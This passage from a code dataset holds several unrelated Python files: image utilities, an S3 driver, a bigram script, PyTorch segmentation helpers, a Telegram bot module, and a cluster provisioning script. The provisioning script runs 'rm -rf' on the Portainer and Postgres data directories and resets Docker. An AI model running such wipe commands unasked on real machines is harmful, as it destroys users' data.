width, 3 ), order='F' )\n return YUV\n\ndef ycbcr2srgb(YUV):\n width = YUV.shape[1]\n height = YUV.shape[0]\n pix_count = width*height\n RGB = (np.reshape( YUV, (pix_count, 3), order='F' ) @ _ycbcr2rgb_rec709.transpose()).reshape( (height, width, 3 ), order='F' )\n return RGB\n","repo_name":"gfxdisp/ColorVideoVDP","sub_path":"examples/ex_utils.py","file_name":"ex_utils.py","file_ext":"py","file_size_in_byte":10054,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"31"} +{"seq_id":"17848790812","text":"\"\"\"\n.. note::\n This driver requires `boto3`_.\n\nConfiguration\n~~~~~~~~~~~~~\n\n.. code-block:: yaml\n\n ---\n gridscale:\n driver: gridscale\n aws_access_key_id: \n aws_secret_access_key: \n region: \n\nYou can manually set ``endpoint_url`` or use a region below as shortcut:\n\n- ``de/fra2`` (gos3.io)\n- ``ch/app1`` (bc01.gos3.io)\n- ``nl/ams1`` (ce21.gos3.io)\n\nSee the `official tutorial`_ for more details.\n\n.. _boto3: https://github.com/boto/boto3\n.. _official tutorial: https://gridscale.io/en/community/tutorials/quick-guide-s3-compatible-object-storage/\n\"\"\"\nfrom os_benchmark.drivers import s3\n\n\nclass Driver(s3.Driver):\n \"\"\"Gridscale S3 Driver\"\"\"\n id = 'gridscale'\n\n ENDPOINTS = {\n 'de/fra2': 'gos3.io',\n 'ch/app1': 'bc01.gos3.io',\n 'nl/ams1': 'ce21.gos3.io',\n }\n\n def __init__(self, *args, **kwargs):\n if 'region' in kwargs:\n self.region = kwargs.pop('region')\n endpoint_url = 'https://%s' % self.ENDPOINTS[self.region]\n kwargs.setdefault('endpoint_url', endpoint_url)\n super().__init__(*args, **kwargs)\n\n def get_url(self, bucket_id, name, **kwargs):\n url = '%s/%s/%s' % (\n self.kwargs['endpoint_url'],\n bucket_id,\n name,\n )\n return url\n","repo_name":"cloudmercato/os-benchmark","sub_path":"os_benchmark/drivers/gridscale.py","file_name":"gridscale.py","file_ext":"py","file_size_in_byte":1320,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"31"} +{"seq_id":"26508648709","text":"# -*- coding: utf-8 -*-\nfrom nltk.util import ngrams\nfrom nltk.tokenize import word_tokenize\nimport codecs\n\nbigram_set = set()\n\n\ndef process_bigrams(text):\n tokens = text.split()\n ngram = ngrams(tokens,2)\n for i in ngram:\n print(i)\n bigram_set.add(i)\n\n\ntweets = codecs.open('Tweets.txt', 'r').readlines()\nmap(process_bigrams, tweets)\nwith open('Bigrams.txt', 'w') as fw:\n for bigram in bigram_set:\n print('Bigram is : ',bigram)\n fw.write('%s\\n' % str(bigram))","repo_name":"ankitrajshree/NLP_Processings_Scripts","sub_path":"Bigram_Extractor.py","file_name":"Bigram_Extractor.py","file_ext":"py","file_size_in_byte":499,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"72911673689","text":"import logging\nimport os\nfrom time import sleep\nfrom uuid import uuid4\n\nimport django\nfrom django.conf import settings\nfrom fabric.api import local\n\nfrom snailshell_cp.clients.portainer import PortainerClient\nfrom snailshell_cp.management.cluster_control.utils import (\n HOST_PG_DIR,\n HOST_SSH_DIR,\n generate_local_ssh_key,\n jdump,\n reset_docker\n)\n\nfrom .base import CommandRunError, cp_task, create_environment\n\nlogger = logging.getLogger(__name__)\n\n\ndef _setup_portainer():\n local( # start Portainer\n f'docker run -d '\n f'-p {settings.ENV.PORTAINER_PORT}:9000 --restart always '\n f'-v /var/run/docker.sock:/var/run/docker.sock '\n f'-v /opt/portainer:/data '\n f'--name {settings.ENV.PORTAINER_DOCKER_CONTAINER_NAME} '\n f'{settings.ENV.PORTAINER_IMAGE_NAME}:{settings.ENV.PORTAINER_IMAGE_TAG}',\n )\n\n sleep(2) # TODO\n\n\ndef _get_portainer_client():\n logger.info('Initializing Portainer...')\n portainer_client = PortainerClient(settings.ENV.PORTAINER_EXTERNAL_URL)\n portainer_client.init_admin(\n settings.ENV.PORTAINER_ADMIN_USER,\n settings.ENV.PORTAINER_ADMIN_PASSWORD,\n )\n portainer_client.authenticate(\n settings.ENV.PORTAINER_ADMIN_USER,\n settings.ENV.PORTAINER_ADMIN_PASSWORD,\n )\n portainer_client.add_endpoint(\n settings.ENV.PORTAINER_LOCAL_ENDPOINT_NAME,\n settings.ENV.DOCKER_LOCAL_SOCKET_PATH,\n )\n return portainer_client\n\n\ndef _apply_migrations():\n attempts_left = 20\n\n while True:\n sleep(3)\n\n try:\n local('python3 manage.py migrate --noinput')\n break\n except CommandRunError as exc:\n logger.info(\n 'Failed to apply migrations. Attempts left: %s',\n attempts_left,\n )\n\n attempts_left -= 1\n\n if attempts_left == 0:\n raise Exception('Can\\'t connect to DB after 60 seconds')\n\n\ndef _setup_postgres(portainer_client):\n postgres_env = {\n 'POSTGRES_USER': '$POSTGRES_USER',\n 'POSTGRES_PASSWORD': '$POSTGRES_PASSWORD',\n 'POSTGRES_DB': '$POSTGRES_DBNAME_CONTROL_PANEL',\n }\n host_config = {\n 'PortBindings': {\n '5432/tcp': [{'HostPort': str(settings.ENV.POSTGRES_PORT)}],\n },\n 'Binds': [\n f'{HOST_PG_DIR}:/var/lib/postgresql/data',\n ],\n }\n volumes = {'/var/lib/postgresql/data': {}}\n\n logger.info('Setting up Postgres...')\n portainer_client.create_image(\n settings.ENV.PORTAINER_LOCAL_ENDPOINT_ID,\n settings.ENV.POSTGRES_IMAGE_NAME,\n settings.ENV.POSTGRES_IMAGE_TAG,\n )\n portainer_client.create_container(\n settings.ENV.PORTAINER_LOCAL_ENDPOINT_ID,\n settings.ENV.POSTGRES_IMAGE_NAME,\n settings.ENV.POSTGRES_IMAGE_TAG,\n name=settings.ENV.POSTGRES_CONTAINER_NAME,\n request_data={\n 'Env': create_environment(postgres_env, include_all=False),\n 'HostConfig': host_config,\n 'RestartPolicy': {'Name': 'unless-stopped'},\n 'Volumes': volumes,\n },\n )\n portainer_client.start_container(\n settings.ENV.PORTAINER_LOCAL_ENDPOINT_ID,\n settings.ENV.POSTGRES_CONTAINER_NAME,\n )\n\n django.setup()\n\n logger.info('Filling DB with initial data...')\n from snailshell_cp.models import Node, AccessKey, PERMISSION_DEPLOY, Service\n from django.contrib.auth.models import User\n\n _apply_migrations()\n\n User.objects.create_superuser(\n username=settings.ENV.CONTROL_PANEL_ADMIN_USER,\n email=f'{settings.ENV.CONTROL_PANEL_ADMIN_USER}@localhost',\n password=settings.ENV.CONTROL_PANEL_ADMIN_PASSWORD,\n )\n logger.info(\n f'Successfully created user {settings.ENV.CONTROL_PANEL_ADMIN_USER}',\n )\n\n node = Node.objects.create(\n id=settings.ENV.PORTAINER_LOCAL_ENDPOINT_ID,\n name=settings.ENV.PORTAINER_LOCAL_ENDPOINT_NAME,\n # These fields are never used for the local node\n host='localhost',\n port=0,\n )\n logger.info(f'Successfully created Node {node}')\n\n AccessKey.objects.create(\n permissions=PERMISSION_DEPLOY,\n value=settings.ENV.CONTROL_PANEL_DEFAULT_DEPLOY_KEY or uuid4().hex,\n )\n\n Service.objects.create(\n node_id=settings.ENV.PORTAINER_LOCAL_ENDPOINT_ID,\n image_name=settings.ENV.POSTGRES_IMAGE_NAME,\n default_image_tag=settings.ENV.POSTGRES_IMAGE_TAG,\n container_name=settings.ENV.POSTGRES_CONTAINER_NAME,\n is_system_service=True,\n env_variables=jdump(postgres_env),\n host_config=jdump(host_config),\n volumes=jdump(volumes),\n )\n\n\ndef _setup_rabbitmq(portainer_client):\n logger.info('Setting up RabbitMQ...')\n from snailshell_cp.models import Service, DeployJob\n from snailshell_cp.tasks import deploy_container\n\n service = Service.objects.create(\n node_id=settings.ENV.PORTAINER_LOCAL_ENDPOINT_ID,\n image_name=settings.ENV.RABBITMQ_IMAGE_NAME,\n default_image_tag=settings.ENV.RABBITMQ_IMAGE_TAG,\n container_name=settings.ENV.RABBITMQ_CONTAINER_NAME,\n is_system_service=True,\n env_variables=jdump({\n 'RABBITMQ_DEFAULT_USER': '$RABBITMQ_USER',\n 'RABBITMQ_DEFAULT_PASS': '$RABBITMQ_PASSWORD',\n }),\n host_config=jdump({\n 'PortBindings': {\n '5672/tcp': [\n {'HostPort': str(settings.ENV.RABBITMQ_PORT)},\n ],\n '15672/tcp': [\n {'HostPort': str(settings.ENV.RABBITMQ_MANAGEMENT_PORT)},\n ],\n },\n\n }),\n )\n\n deploy_job = DeployJob.objects.create(\n service=service,\n )\n deploy_container(\n deploy_job_id=deploy_job.id,\n portainer_client=portainer_client,\n is_provisioning=True,\n )\n\n\ndef _setup_control_panel(portainer_client):\n logger.info('Setting up Control Panel...')\n from snailshell_cp.models import Service, DeployJob\n from snailshell_cp.tasks import deploy_container\n\n container_sshdir = f'/home/{settings.ENV.CONTROL_PANEL_LINUX_USER}/.ssh'\n\n service_cp = Service.objects.create(\n node_id=settings.ENV.PORTAINER_LOCAL_ENDPOINT_ID,\n image_name=settings.ENV.CONTROL_PANEL_IMAGE_NAME,\n default_image_tag=settings.ENV.CONTROL_PANEL_IMAGE_TAG,\n container_name=settings.ENV.CONTROL_PANEL_CONTAINER_NAME,\n is_system_service=True,\n host_config=jdump({\n 'Binds': [\n f'{HOST_SSH_DIR}:{container_sshdir}',\n ],\n 'PortBindings': {\n f'8000/tcp': [\n {'HostPort': str(settings.ENV.CONTROL_PANEL_PORT)},\n ],\n },\n }),\n volumes=jdump({container_sshdir: {}}),\n user_name=settings.ENV.CONTROL_PANEL_LINUX_USER,\n )\n deploy_job_cp = DeployJob.objects.create(\n service=service_cp,\n )\n deploy_container(\n deploy_job_id=deploy_job_cp.id,\n portainer_client=portainer_client,\n is_provisioning=True,\n )\n\n # Celery Main\n service_celery = Service.objects.create(\n node_id=settings.ENV.PORTAINER_LOCAL_ENDPOINT_ID,\n image_name=settings.ENV.CONTROL_PANEL_IMAGE_NAME,\n default_image_tag=settings.ENV.CONTROL_PANEL_IMAGE_TAG,\n container_name=settings.ENV.CONTROL_PANEL_CELERY_MAIN_CONTAINER_NAME,\n is_system_service=True,\n command=jdump(['./run_celery_main.sh']),\n user_name=settings.ENV.CONTROL_PANEL_LINUX_USER,\n )\n deploy_job_celery = DeployJob.objects.create(\n service=service_celery,\n )\n deploy_container(\n deploy_job_id=deploy_job_celery.id,\n portainer_client=portainer_client,\n is_provisioning=True,\n )\n\n # Celery Service\n service_celery = Service.objects.create(\n node_id=settings.ENV.PORTAINER_LOCAL_ENDPOINT_ID,\n image_name=settings.ENV.CONTROL_PANEL_IMAGE_NAME,\n default_image_tag=settings.ENV.CONTROL_PANEL_IMAGE_TAG,\n container_name=settings.ENV.CONTROL_PANEL_CELERY_SERVICE_CONTAINER_NAME,\n is_system_service=True,\n command=jdump(['./run_celery_service.sh']),\n user_name=settings.ENV.CONTROL_PANEL_LINUX_USER,\n )\n deploy_job_celery = DeployJob.objects.create(\n service=service_celery,\n )\n deploy_container(\n deploy_job_id=deploy_job_celery.id,\n portainer_client=portainer_client,\n is_provisioning=True,\n )\n\n\n@cp_task\ndef provision_master_node(reinstall_docker=True):\n \"\"\"\n Run on a main node once to set up all the services needed.\n WARNING: it wipes out everything, all unsaved data will be lost.\n \"\"\"\n os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'snailshell_cp.settings')\n\n reinstall_docker = (reinstall_docker not in (False, '0', 'false', 'False'))\n\n reset_docker(reinstall_docker=reinstall_docker, local_mode=True)\n local('rm -rf /opt/portainer/')\n local(f'rm -rf {HOST_PG_DIR}/*')\n\n _setup_portainer()\n portainer_client = _get_portainer_client()\n\n _setup_postgres(portainer_client)\n _setup_rabbitmq(portainer_client)\n _setup_control_panel(portainer_client)\n\n generate_local_ssh_key()\n","repo_name":"Flid/SnailShell-master","sub_path":"snailshell_cp/management/cluster_control/provision_master.py","file_name":"provision_master.py","file_ext":"py","file_size_in_byte":9234,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"40178376066","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Aug 17 20:19:23 2018\n\n@author: Allen\n\"\"\"\n\nimport zipfile\nimport torch\nimport torchvision\nimport torch.nn as nn\nimport torch.nn.functional as F\nfrom torch.utils import data\nfrom torch.utils.data import Dataset, DataLoader\nfrom torchvision import transforms, utils\nfrom skimage import io, transform\nfrom sklearn.model_selection import train_test_split\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as ply\nimport os\nimport sys\nimport imageio\nfrom PIL import Image\nimport glob\nimport matplotlib.pyplot as plt\nimport time\nimport math\nimport datetime as dt\nimport pytz\nimport pickle\nimport logging\nfrom io import BytesIO\n\n\nif torch.cuda.is_available():\n dtype = torch.cuda.FloatTensor ## UNCOMMENT THIS LINE IF YOU'RE ON A GPU!\nelse: \n dtype = torch.FloatTensor\n \n \nclass IOU_Loss(nn.Module):\n def __init__(self):\n super().__init__()\n \n def forward(self, y_pred, y):\n #print(y_pred.requires_grad)\n #y_pred = torch.where(y_pred.ge(0.5), torch.tensor(1.0), torch.tensor(0.0))\n i = y_pred.mul(y)\n u = (y_pred + y) - i\n mean_iou = torch.mean(i.view(i.shape[0],-1).sum(1) / u.view(i.shape[0],-1).sum(1))\n iou_loss = 1 - mean_iou\n #from boxx import g\n #g()\n \n return iou_loss\n \n\n \nclass Rescale(object):\n \"\"\"Rescale the image in a sample to a given size.\n\n Args:\n output_size (int): Desired output size. \n \"\"\"\n\n def __init__(self, scale='random', min_scale=1, max_scale=3):\n self.scale = scale \n self.min_scale = min_scale \n self.max_scale = max_scale \n\n def __call__(self, sample):\n image, mask = sample['image'], sample['mask']\n \n if self.scale == 'random':\n current_scale = np.clip((np.random.rand() * self.max_scale), self.min_scale, self.max_scale)\n else:\n current_scale = self.scale\n \n output_size = round(np.max(image.shape) * current_scale) \n \n if mask is not None:\n image = np.concatenate([image,mask],2)\n resized_img = transform.resize(image, (output_size, output_size), mode='constant', preserve_range=True)\n #print(resized_img.shape)\n img_final = resized_img[:,:,0:1]\n if mask is not None:\n mask_final = resized_img[:,:,1:]\n\n return {'image':img_final, 'mask':mask_final}\n\nclass RandomCrop(object):\n \"\"\"Crop randomly the image in a sample.\n\n Args:\n output_size (int): Desired output size. \n \"\"\"\n\n def __init__(self, output_size):\n assert isinstance(output_size, int)\n self.output_size = output_size\n\n def __call__(self, sample):\n image, mask = sample['image'], sample['mask']\n if mask is not None:\n image = np.concatenate([image,mask],2)\n\n h, w = image.shape[:2]\n\n new_h = new_w = self.output_size\n top = 0 if h == new_h else np.random.randint(0, h - new_h)\n left = 0 if w == new_w else np.random.randint(0, w - new_w)\n\n\n cropped_image = image[top: top + new_h,\n left: left + new_w]\n \n img_final = cropped_image[:,:,0:1]\n if mask is not None:\n mask_final = cropped_image[:,:,1:]\n\n return {'image':img_final, 'mask':mask_final}\n\nclass Flip(object):\n \"\"\"Crop randomly the image in a sample.\n\n Args:\n output_size (int): Desired output size. \n \"\"\"\n\n def __init__(self, orient='random'):\n assert orient in ['H', 'V', 'NA', 'random']\n self.orient = orient\n\n def __call__(self, sample):\n image, mask = sample['image'], sample['mask']\n if self.orient=='random':\n current_orient = np.random.choice(['H', 'W', 'NA', 'NA']) \n else:\n current_orient = self.orient\n \n if mask is not None:\n image = np.concatenate([image,mask],2)\n\n if current_orient == 'H':\n flipped_image = image[:,::-1,:] - np.zeros_like(image)\n elif current_orient == 'W':\n flipped_image = image[::-1,:,:] - np.zeros_like(image)\n else:\n # do not flip if orient is NA\n flipped_image = image\n img_final = flipped_image[:,:,0:1]\n if mask is not None:\n mask_final = flipped_image[:,:,1:]\n\n return {'image':img_final, 'mask':mask_final}\n\n'''composed = transforms.Compose([Rescale(scale='random', max_scale=5),\n RandomCrop(101),\n Flip(orient='random')])\n\n\ntransformed = composed({'image':image, 'mask':mask})\nx_final, m_final = transformed['image'], transformed['mask']'''\n\nclass SaltDataset(Dataset):\n \"\"\"Face Landmarks dataset.\"\"\"\n\n def __init__(self, np_img, np_mask, df_depth, mean_img, img_out_size=101, transform=None):\n \"\"\"\n Args:\n data_dir (string): Path to the image files.\n train (bool): Load train or test data\n transform (callable, optional): Optional transform to be applied\n on a sample.\n \"\"\"\n self.np_img = np_img\n self.np_mask = np_mask.clip(0,1)\n self.df_depth = df_depth\n self.mean_img = mean_img\n self.img_out_size = img_out_size\n self.transform = transform\n\n def __len__(self):\n return len(self.np_img)\n\n def __getitem__(self, idx):\n\n X_orig = self.np_img[idx]\n X = X_orig - self.mean_img\n \n if self.np_mask is None:\n y = np.zeros((101,101,1))\n else:\n y = self.np_mask[idx]\n \n if self.transform:\n transformed = self.transform({'image':X, 'mask': y})\n X = transformed['image']\n y = transformed['mask']\n \n #print(X.dtype)\n X = np.moveaxis(X, -1,0)\n \n pad_size = self.img_out_size - self.np_img.shape[2]\n X = np.pad(X, [(0, 0),(0, pad_size), (0, pad_size)], mode='constant')\n #print(X.dtype)\n\n d = self.df_depth.iloc[idx,0]\n #id = self.df_depth.index[idx]\n #from boxx import g\n #g()\n X = torch.from_numpy(X).float().type(dtype)\n y = torch.from_numpy(y).float().squeeze().type(dtype)\n\n return (X,y,d,idx)\n \n\nclass SaltNet(nn.Module):\n def __init__(self):\n super().__init__()\n self.seq = nn.Sequential(\n nn.Conv2d(1,64,3, padding=10),\n nn.MaxPool2d(2, 2),\n nn.ReLU(),\n nn.BatchNorm2d(64),\n nn.Conv2d(64,128,3),\n nn.MaxPool2d(2, 2),\n nn.ReLU(),\n nn.BatchNorm2d(128),\n nn.Conv2d(128,256,3),\n nn.MaxPool2d(2, 2),\n nn.ReLU(),\n nn.BatchNorm2d(256),\n nn.ConvTranspose2d(256, 128, 2, stride=2),\n nn.ReLU(),\n nn.BatchNorm2d(128),\n nn.ConvTranspose2d(128, 64, 2, stride=2),\n nn.ReLU(),\n nn.BatchNorm2d(64),\n nn.ConvTranspose2d(64, 1, 2, stride=2, padding=1),\n nn.Sigmoid()\n )\n \n def forward(self, X):\n out = self.seq(X)\n return torch.clamp(out[:,:,:-1,:-1].squeeze(), 0.0, 1.0)\n \n \ndef load_all_data():\n try:\n print('Try loading data from npy and pickle files...')\n np_train_all = np.load('./data/np_train_all.npy')\n np_train_all_mask = np.load('./data/np_train_all_mask.npy')\n np_test = np.concatenate([np.load('./data/np_test_0.npy'), np.load('./data/np_test_1.npy')])\n with open('./data/misc_data.pickle', 'rb') as f:\n misc_data = pickle.load(f)\n print('Data loaded.')\n return (np_train_all, np_train_all_mask, np_test, misc_data)\n \n except:\n print('npy files not found. Reload data from raw images...')\n np_train_all, np_train_all_ids = load_img_to_np('./data/train/images')\n np_train_all_mask, np_train_all_mask_ids = load_img_to_np('./data/train/masks')\n df_train_all_depth = pd.read_csv('./data/depths.csv').set_index('id')\n np_test, np_test_ids = load_img_to_np('./data/test/images')\n np.save('./data/np_train_all.npy', np_train_all)\n np.save('./data/np_train_all_mask.npy', np_train_all_mask)\n for k, v in enumerate(np.split(np_test,2)):\n np.save(f'./data/np_test_{k}.npy', v)\n misc_data = {'df_train_all_depth': df_train_all_depth,\n 'np_train_all_ids': np_train_all_ids,\n 'np_train_all_mask_ids': np_train_all_mask_ids,\n 'np_test_ids': np_test_ids}\n with open('./data/misc_data.pickle', 'wb') as f:\n pickle.dump(misc_data, f, protocol=pickle.HIGHEST_PROTOCOL)\n print('Data loaded.')\n return (np_train_all, np_train_all_mask, np_test, misc_data)\n \n \ndef rle_encoder2d(x):\n if isinstance(x, torch.Tensor):\n x = x.detach().numpy()\n s = pd.Series(x.clip(0,1).flatten('F'))\n s.index = s.index+1\n df = s.to_frame('pred').assign(zero_cumcnt=s.eq(0).cumsum())\n df = df.loc[df.pred.gt(0)]\n df_rle = df.reset_index().groupby('zero_cumcnt').agg({'index': min, 'pred': sum}).astype(int).astype(str)\n rle = ' '.join((df_rle['index'] + ' '+df_rle['pred']).tolist())\n \n return rle\n \n \ndef rle_encoder3d(x): \n return np.r_[[rle_encoder2d(e) for e in x]]\n \n \ndef load_img_to_np(img_path, num_channel=1):\n images = []\n img_ids = []\n for filename in sorted(glob.glob(f'{img_path}/*.png')): #assuming png\n img_id = filename.split('\\\\')[-1].split('.')[0]\n img_ids.append(img_id)\n images.append(np.array(imageio.imread(filename), dtype=np.uint8).reshape(101,101,-1)[:,:,0:num_channel])\n return (np.r_[images], img_ids)\n \n \ndef load_single_img(path, show=False):\n img = np.array(imageio.imread(path), dtype=np.uint8)\n if show:\n plt.imshow(img, cmap='gray')\n return img\n \n \ndef calc_raw_iou(a, b):\n if isinstance(a, torch.Tensor):\n a = a.cpu().detach().numpy()\n if isinstance(b, torch.Tensor):\n b = b.cpu().detach().numpy()\n a = np.clip(a, 0, 1)\n b = np.clip(b, 0, 1)\n u = np.sum(np.clip(a+b, 0, 1), (1,2)).astype(np.float)\n i = np.sum(np.where((a+b)==2, 1, 0), (1,2)).astype(np.float)\n with np.errstate(divide='ignore',invalid='ignore'):\n iou = np.where(i==u, 1, np.where(u==0, 0, i/u))\n \n return iou\n \n \ndef calc_mean_iou(a, b):\n thresholds = np.array([0.5, 0.55, 0.6, 0.65, 0.7, 0.75, 0.8, 0.85, 0.9, 0.95])\n iou = calc_raw_iou(a, b)\n iou_mean = (iou[:,None]>thresholds).mean(1).mean()\n\n return iou_mean\n \n \ndef timeSince(since):\n now = time.time()\n s = now - since\n m = math.floor(s / 60)\n s -= m * 60\n return '%dm %ds' % (m, s)\n \n \ndef get_current_time_as_fname():\n timestamp = (\n dt.datetime.now(pytz.timezone('Australia/Melbourne'))\n .strftime('%Y_%m_%d_%H_%M_%S')\n )\n \n return timestamp\n \n \ndef plot_img_mask_pred(images, labels=None, img_per_line=8):\n images = [i.cpu().detach().numpy().squeeze() if isinstance(i, torch.Tensor) else i.squeeze() for i in images]\n num_img = len(images)\n if labels is None:\n labels = range(num_img)\n\n rows = np.ceil(num_img/img_per_line).astype(int)\n cols = min(img_per_line, num_img)\n f, axarr = plt.subplots(rows,cols)\n if rows==1:\n axarr = axarr.reshape(1,-1)\n f.set_figheight(3*min(img_per_line, num_img)//cols*rows)\n f.set_figwidth(3*min(img_per_line, num_img))\n for i in range(num_img):\n r = i//img_per_line\n c = np.mod(i,img_per_line)\n axarr[r,c].imshow(images[i], cmap='gray')\n axarr[r,c].grid()\n axarr[r,c].set_title(labels[i])\n\n plt.show()\n \n \ndef adjust_predictions(zero_mask_cut_off, X, y_pred, y=None):\n if isinstance(X, torch.Tensor):\n X = X.cpu().detach().numpy()\n if isinstance(y_pred, torch.Tensor):\n y_pred = y_pred.cpu().detach().numpy()\n if isinstance(y, torch.Tensor):\n y = y.cpu().detach().numpy()\n y_pred_adj = y_pred.clip(0,1)\n\n # Set predictions to all 0 for black images\n black_img_mask = (X.mean((1,2,3)) == 0)\n y_pred_adj[black_img_mask]=0\n\n # set all predictions to 0 if the number of positive predictions is less than ZERO_MASK_CUTOFF\n y_pred_adj = np.r_[[e if e.sum()>zero_mask_cut_off else np.zeros_like(e) for e in y_pred_adj]]\n \n if y is not None:\n print(f'IOU score before: {calc_mean_iou(y_pred, y)}, IOU Score after:{calc_mean_iou(y_pred_adj, y)}')\n \n return y_pred_adj\n \ndef show_img_grid():\n pass\n #plt.imshow(torchvision.utils.make_grid(torch.from_numpy(y_train_black).unsqueeze(1)).permute(1, 2, 0))\n \n \ndef join_files(filePrefix, filePath, newFileName=None, returnFileObject=False, removeChunks=False): \n noOfChunks = int(glob.glob(f'{filePath}/{filePrefix}*')[0].split('-')[-1])\n dataList = []\n j = 0\n for i in range(0, noOfChunks, 1):\n j += 1\n chunkName = f\"{filePrefix}-chunk-{j}-Of-{noOfChunks}\"\n f = open(chunkName, 'rb')\n dataList.append(f.read())\n f.close()\n if removeChunks:\n os.remove(chunkName)\n\n if returnFileObject:\n fileOut = BytesIO()\n for data in dataList:\n fileOut.write(data)\n fileOut.seek(0)\n return fileOut \n else:\n fileOut = open(newFileName, 'wb')\n for data in dataList:\n fileOut.write(data)\n f2.close()\n print(f'File parts merged to {newFileName} successfully.')\n \n# define the function to split the file into smaller chunks\ndef split_file_save(inputFile, outputFilePrefix, outputFolder, chunkSize=10000000):\n # read the contents of the file\n if isinstance(inputFile, BytesIO):\n data = inputFile.read()\n inputFile.close()\n else:\n f = open(inputFile, 'rb')\n data = f.read()\n f.close()\n\n# get the length of data, ie size of the input file in bytes\n bytes = len(data)\n\n# calculate the number of chunks to be created\n if sys.version_info.major == 3:\n noOfChunks = int(bytes / chunkSize)\n elif sys.version_info.major == 2:\n noOfChunks = bytes / chunkSize\n if(bytes % chunkSize):\n noOfChunks += 1\n\n chunkNames = []\n j = 0\n for i in range(0, bytes + 1, chunkSize):\n j += 1\n fn1 = f\"{outputFilePrefix}-chunk-{j}-Of-{noOfChunks}\"\n chunkNames.append(fn1)\n f = open(f'{outputFolder}/{fn1}', 'wb')\n f.write(data[i:i + chunkSize])\n f.close()\n \n return chunkNames\n \ndef get_logger(logger_name, level=logging.DEBUG):\n # logger\n file_name = '{}{}'.format('logs/',\n logger_name)\n timestamp = dt.datetime.now(pytz.timezone('Australia/Melbourne'))\\\n .strftime('%Y_%m_%d_%Hh')\n log_file = '{}_{}.log'.format(file_name, timestamp)\n logger = logging.getLogger(logger_name)\n\n formatter = (\n logging\n .Formatter(fmt='%(asctime)s - %(name)s - %(levelname)s - %(message)s',\n datefmt='%d/%m/%Y %H:%M:%S')\n )\n\n # for printing debug details\n fileHandler = logging.FileHandler(log_file, mode='a')\n fileHandler.setFormatter(formatter)\n fileHandler.setLevel(level)\n\n # for printing error messages\n streamHandler = logging.StreamHandler()\n streamHandler.setFormatter(formatter)\n streamHandler.setLevel(logging.DEBUG)\n\n logger.setLevel(level)\n logger.handlers = []\n logger.addHandler(fileHandler)\n logger.addHandler(streamHandler)\n\n return logging.getLogger(logger_name)\n ","repo_name":"allen-q/pytorch-learning","sub_path":"kaggle/salt/salt_func_lib.py","file_name":"salt_func_lib.py","file_ext":"py","file_size_in_byte":15708,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"31"} +{"seq_id":"26636477596","text":"import urllib.request, urllib.parse, urllib.error\r\nimport json\r\nurl ='http://py4e-data.dr-chuck.net/comments_438567.json'\r\nhtml = urllib.request.urlopen(url).read()\r\ninfo = json.loads(html)\r\n#print(info['comments'][0]['count'])\r\n#print(json.dumps(info, indent=4))\r\ni=0\r\nsum=0\r\nwhile True:\r\n try:\r\n p = info['comments'][i]['count']\r\n n = info['comments'][i]['name']\r\n i=i+1\r\n sum=sum+p\r\n except:\r\n break\r\nprint(sum)","repo_name":"tasnia18/Python-assignment-certified-course-in-Coursera-","sub_path":"Using Python to access web data/jsondata.py","file_name":"jsondata.py","file_ext":"py","file_size_in_byte":455,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"16886513328","text":"import html\nfrom typing import Optional, List\n\n\nfrom telegram import Message, Chat, Update, Bot, User\nfrom telegram import ParseMode, InlineKeyboardMarkup\nfrom telegram.error import BadRequest\nfrom telegram.ext import MessageHandler, Filters, CommandHandler, run_async\nfrom telegram.utils.helpers import mention_markdown, mention_html, escape_markdown\n\nimport tg_bot.modules.sql.welcome_sql as sql\nimport tg_bot.modules.sql.top_users_sql as sql_top\nimport tg_bot.modules.sql.global_bans_sql as sql_ban\nfrom tg_bot import dispatcher, OWNER_ID, LOGGER, CHAT_ID\nfrom tg_bot.modules.helper_funcs.chat_status import user_admin, bot_can_delete\nfrom tg_bot.modules.helper_funcs.misc import build_keyboard, revert_buttons\nfrom tg_bot.modules.helper_funcs.msg_types import get_welcome_type\nfrom tg_bot.modules.helper_funcs.string_handling import markdown_parser, \\\n escape_invalid_curly_brackets\nfrom tg_bot.modules.log_channel import loggable\n\nVALID_WELCOME_FORMATTERS = ['first', 'last', 'fullname', 'username', 'id', 'count', 'chatname', 'mention']\n\nENUM_FUNC_MAP = {\n sql.Types.TEXT.value: dispatcher.bot.send_message,\n sql.Types.BUTTON_TEXT.value: dispatcher.bot.send_message,\n sql.Types.STICKER.value: dispatcher.bot.send_sticker,\n sql.Types.DOCUMENT.value: dispatcher.bot.send_document,\n sql.Types.PHOTO.value: dispatcher.bot.send_photo,\n sql.Types.AUDIO.value: dispatcher.bot.send_audio,\n sql.Types.VOICE.value: dispatcher.bot.send_voice,\n sql.Types.VIDEO.value: dispatcher.bot.send_video\n}\n\n# do not async\ndef send(update, message, keyboard, backup_message):\n try:\n msg = update.effective_message.reply_text(message, parse_mode=ParseMode.MARKDOWN, reply_markup=keyboard)\n except IndexError:\n msg = update.effective_message.reply_text(markdown_parser(backup_message + \"\\nПримечание: текущее сообщение было \"\n \"недействительно из-за проблем. Может быть\"\n \"из-за имени пользователя.\"),\n parse_mode=ParseMode.MARKDOWN)\n except KeyError:\n msg = update.effective_message.reply_text(markdown_parser(backup_message + \"\\nПримечание: текущее сообщение: \"\n \"недействительно из-за проблемы с некоторыми неуместными\"\n \"фигурными скобками. Обновите\"),\n parse_mode=ParseMode.MARKDOWN)\n except BadRequest as excp:\n if excp.message == \"Button_url_invalid\":\n msg = update.effective_message.reply_text(markdown_parser(backup_message + \"\\nПримечание: у текущего сообщения недействительный URL \"\n \"на одной из кнопок. Обновите.\"),\n parse_mode=ParseMode.MARKDOWN)\n elif excp.message == \"Unsupported url protocol\":\n msg = update.effective_message.reply_text(markdown_parser(backup_message + \"\\nПримечание: в текущем сообщении есть кнопки, которые \"\n \"используют протоколы URL, которые не поддерживаются\"\n \"Телеграммом. Пожалуйста, обновите.\"),\n parse_mode=ParseMode.MARKDOWN)\n elif excp.message == \"Wrong url host\":\n msg 